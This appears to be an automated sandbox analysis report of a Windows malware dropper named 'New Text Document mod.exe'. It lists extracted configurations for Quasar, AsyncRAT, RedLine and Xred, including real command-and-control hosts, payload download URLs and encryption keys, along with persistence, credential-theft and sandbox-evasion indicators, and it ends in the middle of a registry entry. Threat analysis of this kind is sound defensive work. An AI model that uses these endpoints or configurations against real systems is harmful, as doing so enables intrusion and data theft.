Analysis
-
max time kernel
893s -
max time network
1025s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
13-01-2025 17:32
Behavioral task
behavioral1
Sample
New Text Document mod.exe.zip
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
New Text Document mod.exe.zip
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
New Text Document mod.exe.zip
Resource
win10ltsc2021-20250113-en
Behavioral task
behavioral4
Sample
New Text Document mod.exe.zip
Resource
win11-20241007-en
General
-
Target
New Text Document mod.exe.zip
-
Size
392KB
-
MD5
209c2bed74ce311f3de2c3040f5cbd8b
-
SHA1
676dbe2bbf178ca27210c8a2e37aa9652f4e17d5
-
SHA256
672ad2d52af206cc63cebe2c801181d3b406aae5891cc57bdaafd5eea3d61fe6
-
SHA512
44b5207ce1a79c220ed014b7803ba4f3b89b0aa81f2232e152da9e5c8004c164a281d8806843a10590e3c55b902ef5e3f359bc117b80b11d052fe60324709324
-
SSDEEP
6144:PiyQGVN3t3bmwUUoI7a+OjFjjGFEduVVZ4vELL2VzCGb49pRYCEheDmDUKUQWCCJ:P/HfRx7aNFXuhTL2I70SmpXCqry
Malware Config
Extracted
xred
xred.mooo.com
-
payload_url
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
http://xred.site50.net/syn/SUpdate.ini
https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
http://xred.site50.net/syn/Synaptics.rar
https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
http://xred.site50.net/syn/SSLLibrary.dll
Extracted
quasar
1.4.1
Office04
other-little.gl.at.ply.gg:11758
fbbc34bd-7320-405e-aebb-d4c666ee475f
-
encryption_key
FEA99DED4EFE826DE2850621FD7919E62525FD26
-
install_name
DirectX111.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
DirectX
-
subdirectory
SubDir
Extracted
redline
1V
195.177.92.88:1912
Extracted
asyncrat
0.5.8
Default
0.tcp.in.ngrok.io:10147
38.240.58.195:6606
Q52IWD1RYgpZ
-
delay
3
-
install
false
-
install_file
Listopener.exe
-
install_folder
%AppData%
Extracted
redline
Standoff
89.23.101.77:1912
Extracted
quasar
1.3.0.0
Office04
20.107.53.25:25535
QSR_MUTEX_zQ0poF2lHhCSZKSUZ3
-
encryption_key
E2xbpJ93MnABcIqioTDL
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Extracted
redline
first
212.56.41.77:1912
Extracted
quasar
1.4.1
RuntimeBroker
qrpn9be.localto.net:2810
fc5edab1-6e8f-4963-98aa-bd077e08750f
-
encryption_key
F749DCAC94A1FC3102D2B0CFBBFCB76086F86568
-
install_name
RuntimeBroker.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
RuntimeBroker
-
subdirectory
a7
Extracted
quasar
1.3.0.0
sigorta
217.195.197.170:1604
QSR_MUTEX_9WjAcLINYji1uqfzRt
-
encryption_key
B2vTTMiPGqHXv2xzSGYH
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Extracted
quasar
1.4.1
ROBLOX EXECUTOR
192.168.50.1:4782
10.0.0.113:4782
LETSQOOO-62766.portmap.host:62766
89.10.178.51:4782
90faf922-159d-4166-b661-4ba16af8650e
-
encryption_key
FFEE70B90F5EBED6085600C989F1D6D56E2DEC26
-
install_name
windows 3543.exe
-
log_directory
roblox executor
-
reconnect_delay
3000
-
startup_key
windows background updater
-
subdirectory
windows updater
Extracted
asyncrat
0.5.7B
Default
wzt5xcg.localto.net:1604
wzt5xcg.localto.net:5274
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_file
KYGOClient.exe
-
install_folder
%AppData%
Extracted
vipkeylogger
Signatures
-
Asyncrat family
-
Meduza Stealer payload 3 IoCs
resource yara_rule behavioral4/memory/3424-304-0x0000000000400000-0x0000000000526000-memory.dmp family_meduza behavioral4/memory/3424-308-0x0000000000400000-0x0000000000526000-memory.dmp family_meduza behavioral4/memory/2528-309-0x0000000000400000-0x0000000000526000-memory.dmp family_meduza -
Meduza family
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
description flow ioc Process 356 api.ipify.org Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language New Text Document mod.exe 38 api.ipify.org Process not Found 355 api.ipify.org Process not Found 396 api.ipify.org Process not Found 511 checkip.dyndns.org Process not Found 517 reallyfreegeoip.org Process not Found 519 reallyfreegeoip.org Process not Found 557 api.ipify.org Process not Found 27 api.ipify.org Process not Found 213 ip-api.com Process not Found 304 ip-api.com Process not Found -
Quasar family
-
Quasar payload 12 IoCs
resource yara_rule behavioral4/files/0x0007000000025aee-254.dat family_quasar behavioral4/memory/3352-260-0x0000000000660000-0x0000000000984000-memory.dmp family_quasar behavioral4/files/0x000300000002a7cb-2261.dat family_quasar behavioral4/memory/5660-2266-0x00000000000A0000-0x00000000000FE000-memory.dmp family_quasar behavioral4/files/0x000500000002a4ff-2411.dat family_quasar behavioral4/memory/6164-2421-0x0000000000A80000-0x0000000000DA4000-memory.dmp family_quasar behavioral4/memory/3360-2487-0x0000000000DC0000-0x00000000010E4000-memory.dmp family_quasar behavioral4/files/0x0006000000025b36-2559.dat family_quasar behavioral4/memory/5828-2563-0x0000000000040000-0x000000000009E000-memory.dmp family_quasar behavioral4/files/0x0008000000000695-2747.dat family_quasar behavioral4/memory/1456-2767-0x0000000000630000-0x0000000000954000-memory.dmp family_quasar behavioral4/memory/1140-3267-0x0000000000A20000-0x0000000000D44000-memory.dmp family_quasar -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 6 IoCs
resource yara_rule behavioral4/files/0x0007000000025af5-271.dat family_redline behavioral4/memory/3340-278-0x0000000000330000-0x0000000000382000-memory.dmp family_redline behavioral4/files/0x000300000002a7c9-2250.dat family_redline behavioral4/memory/6600-2255-0x0000000000CD0000-0x0000000000D22000-memory.dmp family_redline behavioral4/files/0x0006000000000689-2323.dat family_redline behavioral4/memory/6552-2327-0x00000000006C0000-0x0000000000712000-memory.dmp family_redline -
Redline family
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Vipkeylogger family
-
XMRig Miner payload 2 IoCs
resource yara_rule behavioral4/files/0x000200000002a7df-2599.dat family_xmrig behavioral4/files/0x000200000002a7df-2599.dat xmrig -
Xmrig family
-
Xred family
-
Async RAT payload 2 IoCs
resource yara_rule behavioral4/files/0x00040000000006a1-1949.dat family_asyncrat behavioral4/files/0x001a00000002acc3-4748.dat family_asyncrat -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
mimikatz is an open source tool to dump credentials on Windows 1 IoCs
resource yara_rule behavioral4/files/0x000400000000f5c4-2027.dat mimikatz -
pid Process 6952 powershell.EXE 6668 powershell.exe 5268 powershell.exe 2156 powershell.exe 7180 powershell.exe 712 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cbot.exe cbot.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cbot.exe cbot.exe -
Executes dropped EXE 43 IoCs
pid Process 1988 New Text Document mod.exe 4628 ._cache_New Text Document mod.exe 2888 Synaptics.exe 4104 ._cache_Synaptics.exe 1824 New Text Document mod.exe 3956 ._cache_New Text Document mod.exe 3352 voidware_loader.exe 1096 DirectX111.exe 3340 build.exe 4656 gem1.exe 3424 gem1.exe 2528 gem1.exe 4676 New Text Document mod.exe 764 ._cache_New Text Document mod.exe 2860 voidware_loader.exe 5128 gem2.exe 6104 Lightshot.exe 6828 New Text Document mod.exe 6988 ._cache_New Text Document mod.exe 5420 New Text Document mod.exe 1600 ._cache_New Text Document mod.exe 5160 cbot.exe 6872 Client.exe 1140 New Text Document mod.exe 1484 ._cache_New Text Document mod.exe 6408 New Text Document mod.exe 3012 ._cache_New Text Document mod.exe 5128 svhost.exe 5296 mimikatz.exe 6296 123.exe 6800 xmrig.exe 5636 chrtrome22.exe 6600 Fixer.exe 5660 Client-built.exe 5076 New Text Document mod.exe 4840 ._cache_New Text Document mod.exe 1920 New Text Document mod.exe 6632 ._cache_New Text Document mod.exe 6552 Steanings.exe 6712 New Text Document mod.exe 6480 ._cache_New Text Document mod.exe 6188 New Text Document mod.exe 5256 ._cache_New Text Document mod.exe -
Loads dropped DLL 25 IoCs
pid Process 2888 Synaptics.exe 2888 Synaptics.exe 1824 New Text Document mod.exe 1824 New Text Document mod.exe 4676 New Text Document mod.exe 4676 New Text Document mod.exe 6828 New Text Document mod.exe 6828 New Text Document mod.exe 5420 New Text Document mod.exe 5420 New Text Document mod.exe 2888 Synaptics.exe 2888 Synaptics.exe 2888 Synaptics.exe 1140 New Text Document mod.exe 1140 New Text Document mod.exe 6408 New Text Document mod.exe 6408 New Text Document mod.exe 5076 New Text Document mod.exe 5076 New Text Document mod.exe 1920 New Text Document mod.exe 1920 New Text Document mod.exe 6712 New Text Document mod.exe 6712 New Text Document mod.exe 6188 New Text Document mod.exe 6188 New Text Document mod.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe Key opened \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe Key opened \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe Key opened \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe Key opened \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" New Text Document mod.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 15 IoCs
flow ioc 183 0.tcp.in.ngrok.io 341 raw.githubusercontent.com 57 drive.google.com 174 drive.google.com 335 raw.githubusercontent.com 44 raw.githubusercontent.com 56 drive.google.com 383 drive.google.com 16 raw.githubusercontent.com 18 raw.githubusercontent.com 18 drive.google.com 528 drive.google.com 15 raw.githubusercontent.com 310 0.tcp.in.ngrok.io 373 0.tcp.in.ngrok.io -
Looks up external IP address via web service 11 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 27 api.ipify.org 213 ip-api.com 355 api.ipify.org 511 checkip.dyndns.org 517 reallyfreegeoip.org 519 reallyfreegeoip.org 557 api.ipify.org 38 api.ipify.org 304 ip-api.com 356 api.ipify.org 396 api.ipify.org -
Power Settings 1 TTPs 24 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 2320 powercfg.exe 4032 powercfg.exe 5616 powercfg.exe 5624 powercfg.exe 8000 powercfg.exe 212 powercfg.exe 4680 powercfg.exe 5440 powercfg.exe 6604 powercfg.exe 7172 powercfg.exe 2552 powercfg.exe 7044 powercfg.exe 5704 cmd.exe 7668 powercfg.exe 2436 powercfg.exe 3408 powercfg.exe 8248 powercfg.exe 5664 powercfg.exe 7036 powercfg.exe 7052 powercfg.exe 7656 powercfg.exe 7080 powercfg.exe 7400 powercfg.exe 7060 powercfg.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe gem2.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe Lightshot.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 4656 set thread context of 3424 4656 gem1.exe 104 PID 4656 set thread context of 2528 4656 gem1.exe 105 PID 5128 set thread context of 5660 5128 gem2.exe 164 PID 6104 set thread context of 7068 6104 Lightshot.exe 196 PID 6104 set thread context of 7096 6104 Lightshot.exe 197 PID 6104 set thread context of 5452 6104 Lightshot.exe 201 -
resource yara_rule behavioral4/files/0x000300000000069f-1904.dat upx behavioral4/memory/5160-1907-0x00007FF7165B0000-0x00007FF7165C7000-memory.dmp upx behavioral4/memory/5160-1942-0x00007FF7165B0000-0x00007FF7165C7000-memory.dmp upx -
Drops file in Windows directory 4 IoCs
description ioc Process File opened for modification C:\Windows\SystemTemp chrome.exe File opened for modification C:\Windows\SystemTemp setup.exe File opened for modification C:\Windows\SystemTemp\Crashpad\metadata setup.exe File opened for modification C:\Windows\SystemTemp\Crashpad\settings.dat setup.exe -
Launches sc.exe 26 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5612 sc.exe 5340 sc.exe 6820 sc.exe 6916 sc.exe 6996 sc.exe 5472 sc.exe 5564 sc.exe 6748 sc.exe 6876 sc.exe 9156 sc.exe 712 sc.exe 7924 sc.exe 5296 sc.exe 5736 sc.exe 6080 sc.exe 7008 sc.exe 5764 sc.exe 8164 sc.exe 3952 sc.exe 8488 sc.exe 5524 sc.exe 1484 sc.exe 7244 sc.exe 8556 sc.exe 3748 sc.exe 8440 sc.exe -
Embeds OpenSSL 1 IoCs
Embeds OpenSSL, may be used to circumvent TLS interception.
resource yara_rule behavioral4/files/0x000600000000f4ac-1998.dat embeds_openssl -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 4212 4656 WerFault.exe 102 8076 4080 WerFault.exe 301 1992 7416 WerFault.exe 332 -
System Location Discovery: System Language Discovery 1 TTPs 21 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language New Text Document mod.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Client-built.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language New Text Document mod.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language New Text Document mod.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gem1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gem1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gem1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Client.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Steanings.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language New Text Document mod.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language New Text Document mod.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language New Text Document mod.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language New Text Document mod.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language New Text Document mod.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 123.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fixer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language New Text Document mod.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language New Text Document mod.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language New Text Document mod.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 5344 cmd.exe 8160 PING.EXE -
NSIS installer 2 IoCs
resource yara_rule behavioral4/files/0x001900000002ad7d-4772.dat nsis_installer_1 behavioral4/files/0x001900000002ad7d-4772.dat nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags wmiprvse.exe -
Checks processor information in registry 2 TTPs 9 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE -
Enumerates system info in registry 2 TTPs 7 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE -
Kills process with taskkill 2 IoCs
pid Process 3488 taskkill.exe 8528 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs lsass.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133812639527220755" chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs lsass.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates lsass.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs lsass.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 = 44003100000000002d5acb8d10006100340009000400efbe2d5ab18d2d5acc8d2e000000ed5a020000000600000000000000000000000000000071793f006100000010000000 chrome.exe Key created \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" chrome.exe Key created 